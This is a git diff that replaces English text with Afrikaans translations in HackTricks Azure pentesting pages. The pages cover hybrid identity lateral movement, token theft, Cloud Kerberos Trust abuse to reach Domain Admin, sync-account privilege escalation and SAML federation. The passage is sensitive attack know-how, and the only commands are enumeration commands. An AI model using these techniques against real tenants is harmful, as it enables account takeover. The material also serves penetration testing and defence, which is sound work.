diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index 5e04d31db..ee22244a6 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,16 +1,11 @@ You can remove this content before sending the PR: ## Attribution -We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone. +Ons waardeer jou kennis en moedig jou aan om inhoud te deel. Maak asseblief seker dat jy slegs inhoud oplaai wat jy besit of waarvoor jy toestemming het om dit van die oorspronklike outeur te deel (voeg 'n verwysing na die outeur in die bygevoegde teks of aan die einde van die bladsy wat jy wysig of albei). Jou respek vir intellektuele eiendomsregte bevorder 'n betroubare en wettige deelomgewing vir almal. ## HackTricks Training -If you are adding so you can pass the in the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-`. - -Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction. - - -In any case, thanks for contributing to HackTricks! - - +As jy byvoeg sodat jy die in die [ARTE certification](https://training.hacktricks.xyz/courses/arte) eksamen met 2 vlae in plaas van 3 kan slaag, moet jy die PR `arte-` noem. +Onthou ook dat grammatika/sintaksis regstellings nie aanvaar sal word vir die eksamenvlag vermindering nie. +In elk geval, dankie dat jy bydra tot HackTricks! diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md index 855759013..36e8054f9 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md @@ -4,66 +4,62 @@ {{#include ../../../banners/hacktricks-training.md}} -### On-Prem machines connected to cloud +### On-Prem masjiene wat aan die wolk gekoppel is -There are different ways a machine can be connected to the cloud: +Daar is verskillende maniere waarop 'n masjien aan die wolk gekoppel kan wees: -#### Azure AD joined +#### Azure AD aangesluit
-#### Workplace joined +#### Werkplek aangesluit

https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large

-#### Hybrid joined +#### Hibrid aangesluit

https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large

-#### Workplace joined on AADJ or Hybrid +#### Werkplek aangesluit op AADJ of Hibrid

https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

-### Tokens and limitations +### Tokens en beperkings -In Azure AD, there are different types of tokens with specific limitations: +In Azure AD is daar verskillende tipes tokens met spesifieke beperkings: -- **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource. -- **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications. -- **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device. -- **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens. +- **Toegangstokens**: Gebruik om API's en hulpbronne soos die Microsoft Graph te benader. Hulle is aan 'n spesifieke kliënt en hulpbron gekoppel. +- **Herlaai tokens**: Uitgereik aan toepassings om nuwe toegangstokens te verkry. Hulle kan slegs deur die toepassing wat hulle ontvang het of 'n groep toepassings gebruik word. +- **Primêre Herlaai Tokens (PRT)**: Gebruik vir Enkel Teken-In op Azure AD aangeslote, geregistreerde, of hibrid aangeslote toestelle. Hulle kan in blaaierteken-in vloei en vir teken-in op mobiele en desktop toepassings op die toestel gebruik word. +- **Windows Hello for Business sleutels (WHFB)**: Gebruik vir wagwoordlose verifikasie. Dit word gebruik om Primêre Herlaai Tokens te verkry. -The most interesting type of token is the Primary Refresh Token (PRT). +Die mees interessante tipe token is die Primêre Herlaai Token (PRT). {{#ref}} az-primary-refresh-token-prt.md {{#endref}} -### Pivoting Techniques +### Pivoting Tegnieke -From the **compromised machine to the cloud**: +Van die **gekompromitteerde masjien na die wolk**: -- [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login -- [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text. -- [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it -- [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it. -- [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another +- [**Pass the Cookie**](az-pass-the-cookie.md): Steel Azure koekies uit die blaaiert en gebruik dit om in te teken +- [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump die geheue van plaaslike prosesse wat met die wolk gesinkroniseer is (soos excel, Teams...) en vind toegangstokens in duidelike teks. +- [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish die PRT om dit te misbruik +- [**Pass the PRT**](pass-the-prt.md): Steel die toestel PRT om Azure te benader deur dit na te doen. +- [**Pass the Certificate**](az-pass-the-certificate.md)**:** Genereer 'n sertifikaat gebaseer op die PRT om van een masjien na 'n ander in te teken -From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**: +Van die kompromitering van **AD** na die kompromitering van die **Wolk** en van die kompromitering van die **Wolk na** die kompromitering van **AD**: - [**Azure AD Connect**](azure-ad-connect-hybrid-identity/) -- **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md) +- **Nog 'n manier om van die wolk na On-Prem te pivot is** [**misbruik van Intune**](../az-services/intune.md) #### [Roadtx](https://github.com/dirkjanm/ROADtools) -This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/) +Hierdie hulpmiddel stel jou in staat om verskeie aksies uit te voer, soos om 'n masjien in Azure AD te registreer om 'n PRT te verkry, en PRT's (legitiem of gesteel) te gebruik om hulpbronne op verskillende maniere te benader. Dit is nie direkte aanvalle nie, maar dit fasiliteer die gebruik van PRT's om hulpbronne op verskillende maniere te benader. Vind meer inligting in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/) -## References +## Verwysings - [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md index ec734cb69..ddfe05b22 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md @@ -4,61 +4,55 @@ ## Basic Information -Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments: +Integrasie tussen **On-premises Active Directory (AD)** en **Azure AD** word gefasiliteer deur **Azure AD Connect**, wat verskeie metodes bied wat **Single Sign-on (SSO)** ondersteun. Elke metode, terwyl nuttig, bied potensiële sekuriteitskwesies wat benut kan word om cloud of on-premises omgewings te kompromitteer: - **Pass-Through Authentication (PTA)**: - - Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud). - - Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem). +- Moglike kompromie van die agent op die on-prem AD, wat die validasie van gebruikerswagwoorde vir Azure verbindings (on-prem na Cloud) toelaat. +- Die haalbaarheid om 'n nuwe agent te registreer om autentifikasies in 'n nuwe ligging (Cloud na on-prem) te valideer. {{#ref}} pta-pass-through-authentication.md {{#endref}} - **Password Hash Sync (PHS)**: - - Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user. +- Potensiële onttrekking van duidelike teks wagwoorde van bevoorregte gebruikers uit die AD, insluitend akrediteer van 'n hoogs bevoorregte, outomaties gegenereerde AzureAD gebruiker. {{#ref}} phs-password-hash-sync.md {{#endref}} - **Federation**: - - Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities. +- Diefstal van die private sleutel wat gebruik word vir SAML ondertekening, wat die nabootsing van on-prem en cloud identiteite moontlik maak. {{#ref}} federation.md {{#endref}} - **Seamless SSO:** - - Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user. +- Diefstal van die `AZUREADSSOACC` gebruiker se wagwoord, wat gebruik word vir die ondertekening van Kerberos silwer kaartjies, wat die nabootsing van enige cloud gebruiker toelaat. {{#ref}} seamless-sso.md {{#endref}} - **Cloud Kerberos Trust**: - - Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD. +- Moglikheid om van Global Admin na on-prem Domain Admin te eskaleer deur AzureAD gebruikersname en SIDs te manipuleer en TGT's van AzureAD aan te vra. {{#ref}} az-cloud-kerberos-trust.md {{#endref}} - **Default Applications**: - - Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files. +- Kompromitering van 'n Application Administrator rekening of die on-premise Sync Account laat die aanpassing van gidsinstellings, groep lidmaatskappe, gebruikersrekeninge, SharePoint webwerwe, en OneDrive lêers toe. {{#ref}} az-default-applications.md {{#endref}} -For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain. - -To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used: +Vir elke integrasiemethode word gebruikerssynchronisasie uitgevoer, en 'n `MSOL_` rekening word in die on-prem AD geskep. Opmerklik is dat beide **PHS** en **PTA** metodes **Seamless SSO** fasiliteer, wat outomatiese aanmelding vir Azure AD rekenaars wat aan die on-prem domein gekoppel is, moontlik maak. +Om die installasie van **Azure AD Connect** te verifieer, kan die volgende PowerShell-opdrag, wat die **AzureADConnectHealthSync** module gebruik (standaard geïnstalleer met Azure AD Connect), gebruik word: ```powershell Get-ADSyncConnector ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md index 0b8debf3e..acc4cac42 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md @@ -2,52 +2,48 @@ {{#include ../../../../banners/hacktricks-training.md}} -**This post is a summary of** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **which can be checked for further information about the attack. This technique is also commented in** [**https://www.youtube.com/watch?v=AFay_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.** +**Hierdie pos is 'n opsomming van** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **wat nagegaan kan word vir verdere inligting oor die aanval. Hierdie tegniek word ook kommentaar gegee in** [**https://www.youtube.com/watch?v=AFay_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.** -## Basic Information +## Basiese Inligting -### Trust +### Vertroue -When a trust is stablished with Azure AD, a **Read Only Domain Controller (RODC) is created in the AD.** The **RODC computer account**, named **`AzureADKerberos$`**. Also, a secondary `krbtgt` account named **`krbtgt_AzureAD`**. This account contains the **Kerberos keys** used for tickets that Azure AD creates. +Wanneer 'n vertroue met Azure AD gevestig word, 'n **Read Only Domain Controller (RODC) word in die AD geskep.** Die **RODC rekenaarrekening**, genaamd **`AzureADKerberos$`**. Ook, 'n sekondêre `krbtgt` rekening genaamd **`krbtgt_AzureAD`**. Hierdie rekening bevat die **Kerberos sleutels** wat gebruik word vir kaartjies wat Azure AD skep. -Therefore, if this account is compromised it could be possible to impersonate any user... although this is not true because this account is prevented from creating tickets for any common privileged AD group like Domain Admins, Enterprise Admins, Administrators... +Daarom, as hierdie rekening gecompromitteer word, kan dit moontlik wees om enige gebruiker na te boots... alhoewel dit nie waar is nie omdat hierdie rekening verhinder word om kaartjies vir enige algemene bevoorregte AD-groep soos Domain Admins, Enterprise Admins, Administrators... te skep. > [!CAUTION] -> However, in a real scenario there are going to be privileged users that aren't in those groups. So the **new krbtgt account, if compromised, could be used to impersonate them.** +> egter, in 'n werklike scenario gaan daar bevoorregte gebruikers wees wat nie in daardie groepe is nie. So die **nuwe krbtgt rekening, indien gecompromitteer, kan gebruik word om hulle na te boots.** ### Kerberos TGT -Moreover, when a user authenticates on Windows using a hybrid identity **Azure AD** will issue **partial Kerberos ticket along with the PRT.** The TGT is partial because **AzureAD has limited information** of the user in the on-prem AD (like the security identifier (SID) and the name).\ -Windows can then **exchange this partial TGT for a full TGT** by requesting a service ticket for the `krbtgt` service. +Boonop, wanneer 'n gebruiker op Windows autentiseer met 'n hibriede identiteit, **Azure AD** sal 'n **gedeeltelike Kerberos kaartjie saam met die PRT uitreik.** Die TGT is gedeeltelik omdat **AzureAD beperkte inligting** van die gebruiker in die on-prem AD het (soos die sekuriteitsidentifiseerder (SID) en die naam).\ +Windows kan dan **hierdie gedeeltelike TGT vir 'n volle TGT ruil** deur 'n dienskaartjie vir die `krbtgt` diens aan te vra. ### NTLM -As there could be services that doesn't support kerberos authentication but NTLM, it's possible to request a **partial TGT signed using a secondary `krbtgt`** key including the **`KERB-KEY-LIST-REQ`** field in the **PADATA** part of the request and then get a full TGT signed with the primary `krbtgt` key **including the NT hash in the response**. +Aangesien daar dienste kan wees wat nie Kerberos-autentisering ondersteun nie, maar NTLM, is dit moontlik om 'n **gedeeltelike TGT wat met 'n sekondêre `krbtgt`** sleutel onderteken is, aan te vra deur die **`KERB-KEY-LIST-REQ`** veld in die **PADATA** deel van die versoek in te sluit en dan 'n volle TGT te verkry wat met die primêre `krbtgt` sleutel onderteken is **wat die NT-hash in die antwoord insluit**. -## Abusing Cloud Kerberos Trust to obtain Domain Admin +## Misbruik van Cloud Kerberos Trust om Domain Admin te verkry -When AzureAD generates a **partial TGT** it will be using the details it has about the user. Therefore, if a Global Admin could modify data like the **security identifier and name of the user in AzureAD**, when requesting a TGT for that user the **security identifier would be a different one**. +Wanneer AzureAD 'n **gedeeltelike TGT** genereer, sal dit die besonderhede wat dit oor die gebruiker het, gebruik. Daarom, as 'n Global Admin data soos die **sekuriteitsidentifiseerder en naam van die gebruiker in AzureAD** kan verander, wanneer 'n TGT vir daardie gebruiker aangevra word, sal die **sekuriteitsidentifiseerder 'n ander een wees**. -It's not possible to do that through the Microsoft Graph or the Azure AD Graph, but it's possible to use the **API Active Directory Connect** uses to create and update synced users, which can be used by the Global Admins to **modify the SAM name and SID of any hybrid user**, and then if we authenticate, we get a partial TGT containing the modified SID. +Dit is nie moontlik om dit deur die Microsoft Graph of die Azure AD Graph te doen nie, maar dit is moontlik om die **API wat Active Directory Connect** gebruik om gesinkroniseerde gebruikers te skep en op te dateer, te gebruik, wat deur die Global Admins gebruik kan word om die **SAM naam en SID van enige hibriede gebruiker** te verander, en dan, as ons autentiseer, kry ons 'n gedeeltelike TGT wat die veranderde SID bevat. -Note that we can do this with AADInternals and update to synced users via the [Set-AADIntAzureADObject](https://aadinternals.com/aadinternals/#set-aadintazureadobject-a) cmdlet. +Let daarop dat ons dit met AADInternals kan doen en opdateer na gesinkroniseerde gebruikers via die [Set-AADIntAzureADObject](https://aadinternals.com/aadinternals/#set-aadintazureadobject-a) cmdlet. -### Attack prerequisites +### Aanval vereistes -The success of the attack and attainment of Domain Admin privileges hinge on meeting certain prerequisites: +Die sukses van die aanval en die verkryging van Domain Admin voorregte hang af van die nakoming van sekere vereistes: -- The capability to alter accounts via the Synchronization API is crucial. This can be achieved by having the role of Global Admin or possessing an AD Connect sync account. Alternatively, the Hybrid Identity Administrator role would suffice, as it grants the ability to manage AD Connect and establish new sync accounts. -- Presence of a **hybrid account** is essential. This account must be amenable to modification with the victim account's details and should also be accessible for authentication. -- Identification of a **target victim account** within Active Directory is a necessity. Although the attack can be executed on any account already synchronized, the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account to procure the ticket. - - Additionally, this account should possess domain admin equivalent privileges but must not be a member of typical AD administrator groups to avoid the generation of invalid TGTs by the AzureAD RODC. - - The most suitable target is the **Active Directory account utilized by the AD Connect Sync service**. This account is not synchronized with Azure AD, leaving its SID as a viable target, and it inherently holds Domain Admin equivalent privileges due to its role in synchronizing password hashes (assuming Password Hash Sync is active). For domains with express installation, this account is prefixed with **MSOL\_**. For other instances, the account can be pinpointed by enumerating all accounts endowed with Directory Replication privileges on the domain object. +- Die vermoë om rekeninge deur die Synchronization API te verander, is van kardinale belang. Dit kan bereik word deur die rol van Global Admin te hê of 'n AD Connect sink rekening te besit. Alternatiewelik, die Hybrid Identity Administrator rol sal voldoende wees, aangesien dit die vermoë bied om AD Connect te bestuur en nuwe sink rekeninge te vestig. +- Die teenwoordigheid van 'n **hibriede rekening** is noodsaaklik. Hierdie rekening moet ontvanklik wees vir verandering met die slagoffer rekening se besonderhede en moet ook toeganklik wees vir autentisering. +- Identifikasie van 'n **teiken slagoffer rekening** binne Active Directory is 'n noodsaaklikheid. Alhoewel die aanval op enige rekening wat reeds gesinkroniseer is, uitgevoer kan word, moet die Azure AD tenant nie on-premises sekuriteitsidentifiseerders gerepliceer het nie, wat die verandering van 'n nie-gesinkroniseerde rekening vereis om die kaartjie te verkry. +- Boonop moet hierdie rekening domein admin gelyke voorregte hê, maar mag nie 'n lid van tipiese AD administrateur groepe wees nie om die generering van ongeldige TGTs deur die AzureAD RODC te vermy. +- Die mees geskikte teiken is die **Active Directory rekening wat deur die AD Connect Sync diens gebruik word**. Hierdie rekening is nie met Azure AD gesinkroniseer nie, wat sy SID as 'n lewensvatbare teiken laat, en dit hou inherent domein admin gelyke voorregte weens sy rol in die sinkronisering van wagwoord hashes (aangenome dat Password Hash Sync aktief is). Vir domeine met uitdruklike installasie, word hierdie rekening voorafgegaan met **MSOL\_**. Vir ander gevalle kan die rekening geïdentifiseer word deur alle rekeninge met Directory Replication voorregte op die domein objek te tel. -### The full attack +### Die volle aanval -Check it in the original post: [https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) +Kyk dit in die oorspronklike pos: [https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md index 593b0222a..7069b627c 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md @@ -2,12 +2,8 @@ {{#include ../../../../banners/hacktricks-training.md}} -**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8) +**Kontroleer die tegniek in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) en [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8) -The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post. +Die blogpos bespreek 'n voorregverhoging kwesbaarheid in Azure AD, wat Toepassing Administrateurs of gecompromitteerde On-Premise Sync Rekeninge in staat stel om voorregte te verhoog deur kredensiale aan toepassings toe te ken. Die kwesbaarheid, wat voortkom uit die "per ontwerp" gedrag van Azure AD se hantering van toepassings en diens prinsipale, beïnvloed veral standaard Office 365 toepassings. Alhoewel gerapporteer, word die probleem nie as 'n kwesbaarheid deur Microsoft beskou nie weens dokumentasie van die administratiewe regte toekenning gedrag. Die pos bied gedetailleerde tegniese insigte en adviseer gereelde hersienings van diens prinsipaal kredensiale in Azure AD omgewings. Vir meer gedetailleerde inligting, kan jy die oorspronklike blogpos besoek. {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md index 4af67011b..04024a014 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md @@ -1,36 +1,30 @@ -# Az- Synchronising New Users +# Az- Sinchronisering van Nuwe Gebruikers {{#include ../../../../banners/hacktricks-training.md}} -## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD +## Sinchronisering van AzureAD gebruikers na on-prem om op te skaal van on-prem na AzureAD -I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements: - -- The **AzureAD user** needs to have a proxy address (a **mailbox**) -- License is not required -- Should **not be already synced** +Om 'n nuwe gebruiker f**van AzureAD na die on-prem AD** te sinchroniseer, is die volgende vereistes: +- Die **AzureAD gebruiker** moet 'n proxy adres hê (n **posbus**) +- Lisensie is nie vereis nie +- Moet **nie reeds gesinchroniseer wees nie** ```powershell Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl ``` +Wanneer 'n gebruiker soos hierdie in AzureAD gevind word, om dit **van die on-prem AD te benader** moet jy net **'n nuwe rekening skep** met die **proxyAddress** die SMTP e-pos. -When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email. - -An automatically, this user will be **synced from AzureAD to the on-prem AD user**. +Automaties sal hierdie gebruiker **gesinkroniseer word van AzureAD na die on-prem AD gebruiker**. > [!CAUTION] -> Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**. +> Let daarop dat jy om hierdie aanval uit te voer **nie Domain Admin** nodig het nie, jy het net toestemmings nodig om **nuwe gebruikers te skep**. > -> Also, this **won't bypass MFA**. +> Ook, dit **sal nie MFA omseil** nie. > -> Moreover, this was reported an **account sync is no longer possible for admin accounts**. +> Boonop is daar berig dat **rekening sinkronisasie nie meer moontlik is vir admin rekeninge**. ## References - [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md index 480c5f22b..7a9763f31 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md @@ -1,35 +1,35 @@ -# Az - Federation +# Az - Federasie {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-fed)**Federation** is a collection of **domains** that have established **trust**. The level of trust may vary, but typically includes **authentication** and almost always includes **authorization**. A typical federation might include a **number of organizations** that have established **trust** for **shared access** to a set of resources. +[Uit die dokumentasie:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-fed)**Federasie** is 'n versameling van **domeine** wat **vertroue** gevestig het. Die vlak van vertroue kan verskil, maar sluit tipies **verifikasie** in en sluit byna altyd **autorisasie** in. 'n Tipiese federasie kan 'n **aantal organisasies** insluit wat **vertroue** gevestig het vir **gedeelde toegang** tot 'n stel hulpbronne. -You can **federate your on-premises** environment **with Azure AD** and use this federation for authentication and authorization. This sign-in method ensures that all user **authentication occurs on-premises**. This method allows administrators to implement more rigorous levels of access control. Federation with **AD FS** and PingFederate is available. +Jy kan jou **on-premises** omgewing **met Azure AD** federate en hierdie federasie gebruik vir verifikasie en autorisasie. Hierdie aanmeldmetode verseker dat alle gebruiker **verifikasie plaasvind op-premises**. Hierdie metode stel administrateurs in staat om meer streng vlakke van toegangbeheer te implementeer. Federasie met **AD FS** en PingFederate is beskikbaar.
-Bsiacally, in Federation, all **authentication** occurs in the **on-prem** environment and the user experiences SSO across all the trusted environments. Therefore, users can **access** **cloud** applications by using their **on-prem credentials**. +Basies, in Federasie, vind alle **verifikasie** plaas in die **on-prem** omgewing en die gebruiker ervaar SSO oor al die vertroude omgewings. Daarom kan gebruikers **toegang** tot **cloud** toepassings verkry deur hul **on-prem kredensiale** te gebruik. -**Security Assertion Markup Language (SAML)** is used for **exchanging** all the authentication and authorization **information** between the providers. +**Security Assertion Markup Language (SAML)** word gebruik vir **uitruiling** van alle verifikasie en autorisasie **inligting** tussen die verskaffers. -In any federation setup there are three parties: +In enige federasie-opstelling is daar drie partye: -- User or Client -- Identity Provider (IdP) -- Service Provider (SP) +- Gebruiker of Kliënt +- Identiteitsverskaffer (IdP) +- Diensverskaffer (SP) -(Images from https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) +(Bilde van https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
-1. Initially, an application (Service Provider or SP, such as AWS console or vSphere web client) is accessed by a user. This step might be bypassed, leading the client directly to the IdP (Identity Provider) depending on the specific implementation. -2. Subsequently, the SP identifies the appropriate IdP (e.g., AD FS, Okta) for user authentication. It then crafts a SAML (Security Assertion Markup Language) AuthnRequest and reroutes the client to the chosen IdP. -3. The IdP takes over, authenticating the user. Post-authentication, a SAMLResponse is formulated by the IdP and forwarded to the SP through the user. -4. Finally, the SP evaluates the SAMLResponse. If validated successfully, implying a trust relationship with the IdP, the user is granted access. This marks the completion of the login process, allowing the user to utilize the service. +1. Aanvanklik word 'n toepassing (Diensverskaffer of SP, soos AWS-konsol of vSphere-webkliënt) deur 'n gebruiker toegang verkry. Hierdie stap kan oorgeslaan word, wat die kliënt direk na die IdP (Identiteitsverskaffer) lei, afhangende van die spesifieke implementering. +2. Vervolgens identifiseer die SP die toepaslike IdP (bv. AD FS, Okta) vir gebruiker verifikasie. Dit stel dan 'n SAML (Security Assertion Markup Language) AuthnRequest op en herlei die kliënt na die gekose IdP. +3. Die IdP neem oor, wat die gebruiker verifieer. Na verifikasie word 'n SAMLResponse deur die IdP geformuleer en aan die SP deur die gebruiker gestuur. +4. Laastens evalueer die SP die SAMLResponse. As dit suksesvol geverifieer word, wat 'n vertrouensverhouding met die IdP impliseer, word die gebruiker toegang verleen. Dit merk die voltooiing van die aanmeldproses, wat die gebruiker in staat stel om die diens te gebruik. -**If you want to learn more about SAML authentication and common attacks go to:** +**As jy meer wil leer oor SAML-verifikasie en algemene aanvalle, gaan na:** {{#ref}} https://book.hacktricks.xyz/pentesting-web/saml-attacks @@ -37,54 +37,53 @@ https://book.hacktricks.xyz/pentesting-web/saml-attacks ## Pivoting -- AD FS is a claims-based identity model. -- "..claimsaresimplystatements(forexample,name,identity,group), made about users, that are used primarily for authorizing access to claims-based applications located anywhere on the Internet." -- Claims for a user are written inside the SAML tokens and are then signed to provide confidentiality by the IdP. -- A user is identified by ImmutableID. It is globally unique and stored in Azure AD. -- 